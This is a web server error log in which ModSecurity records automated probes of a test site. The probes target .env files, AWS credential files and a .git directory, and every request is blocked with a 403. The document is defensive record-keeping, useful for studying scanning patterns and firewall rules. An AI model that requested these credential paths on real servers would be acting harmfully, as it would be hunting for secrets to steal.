[Sun Jun 08 02:26:41.227992 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aETYwf1_TH61fgprOmdtcgAAAAA"]
[Sun Jun 08 02:26:41.228208 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aETYwf1_TH61fgprOmdtcgAAAAA"]
[Sun Jun 08 02:26:41.228407 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aETYwf1_TH61fgprOmdtcgAAAAA"]
[Sun Jun 08 02:26:44.919397 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aETYxP1_TH61fgprOmdtdAAAAAA"]
[Sun Jun 08 02:26:44.919602 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aETYxP1_TH61fgprOmdtdAAAAAA"]
[Sun Jun 08 02:26:44.919809 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aETYxP1_TH61fgprOmdtdAAAAAA"]
[Sun Jun 08 02:26:45.704260 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /library/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aETYxf1_TH61fgprOmdtdQAAAAA"]
[Sun Jun 08 02:26:45.704495 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aETYxf1_TH61fgprOmdtdQAAAAA"]
[Sun Jun 08 02:26:45.704684 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aETYxf1_TH61fgprOmdtdQAAAAA"]
[Sun Jun 08 02:26:46.421428 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nextjs-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aETYxv1_TH61fgprOmdtdgAAAAA"]
[Sun Jun 08 02:26:46.421635 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aETYxv1_TH61fgprOmdtdgAAAAA"]
[Sun Jun 08 02:26:46.421808 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aETYxv1_TH61fgprOmdtdgAAAAA"]
[Sun Jun 08 02:26:47.370615 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aETYx_1_TH61fgprOmdtdwAAAAA"]
[Sun Jun 08 02:26:47.370844 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aETYx_1_TH61fgprOmdtdwAAAAA"]
[Sun Jun 08 02:26:47.371021 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aETYx_1_TH61fgprOmdtdwAAAAA"]
[Sun Jun 08 02:26:48.242532 2025] [authz_core:error] [pid 3707672] [client 107.150.0.115:46684] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Sun Jun 08 02:26:49.330918 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aETYyf1_TH61fgprOmdteQAAAAA"]
[Sun Jun 08 02:26:49.331128 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aETYyf1_TH61fgprOmdteQAAAAA"]
[Sun Jun 08 02:26:49.331313 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aETYyf1_TH61fgprOmdteQAAAAA"]
[Sun Jun 08 02:26:50.696392 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aETYyv1_TH61fgprOmdtegAAAAA"]
[Sun Jun 08 02:26:50.696608 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aETYyv1_TH61fgprOmdtegAAAAA"]
[Sun Jun 08 02:26:50.696847 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aETYyv1_TH61fgprOmdtegAAAAA"]
[Sun Jun 08 02:26:52.079197 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /home/user/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/home/user/.aws/credentials"] [unique_id "aETYzP1_TH61fgprOmdtewAAAAA"]
[Sun Jun 08 02:26:52.079414 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/home/user/.aws/credentials"] [unique_id "aETYzP1_TH61fgprOmdtewAAAAA"]
[Sun Jun 08 02:26:52.079591 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/home/user/.aws/credentials"] [unique_id "aETYzP1_TH61fgprOmdtewAAAAA"]
[Sun Jun 08 02:26:53.500142 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /myproject/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aETYzf1_TH61fgprOmdtfAAAAAA"]
[Sun Jun 08 02:26:53.500361 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aETYzf1_TH61fgprOmdtfAAAAAA"]
[Sun Jun 08 02:26:53.500546 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aETYzf1_TH61fgprOmdtfAAAAAA"]
[Sun Jun 08 02:26:54.859580 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs/.production/.django"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aETYzv1_TH61fgprOmdtfQAAAAA"]
[Sun Jun 08 02:26:54.859842 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aETYzv1_TH61fgprOmdtfQAAAAA"]
[Sun Jun 08 02:26:54.860692 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aETYzv1_TH61fgprOmdtfQAAAAA"]
[Sun Jun 08 02:26:56.164658 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aETY0P1_TH61fgprOmdtfgAAAAA"]
[Sun Jun 08 02:26:56.164861 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aETY0P1_TH61fgprOmdtfgAAAAA"]
[Sun Jun 08 02:26:56.165049 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aETY0P1_TH61fgprOmdtfgAAAAA"]
[Sun Jun 08 02:26:57.311436 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aETY0f1_TH61fgprOmdtfwAAAAA"]
[Sun Jun 08 02:26:57.311644 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aETY0f1_TH61fgprOmdtfwAAAAA"]
[Sun Jun 08 02:26:57.311833 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aETY0f1_TH61fgprOmdtfwAAAAA"]
[Sun Jun 08 02:31:01.590087 2025] [:error] [pid 3709499] [client 34.162.135.152:33868] [client 34.162.135.152] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aETZxbUz9CVwWtZ9cYd_3AAAAAI"]
[Sun Jun 08 02:31:01.590403 2025] [:error] [pid 3709499] [client 34.162.135.152:33868] [client 34.162.135.152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aETZxbUz9CVwWtZ9cYd_3AAAAAI"]
[Sun Jun 08 02:31:01.590571 2025] [:error] [pid 3709499] [client 34.162.135.152:33868] [client 34.162.135.152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aETZxbUz9CVwWtZ9cYd_3AAAAAI"]
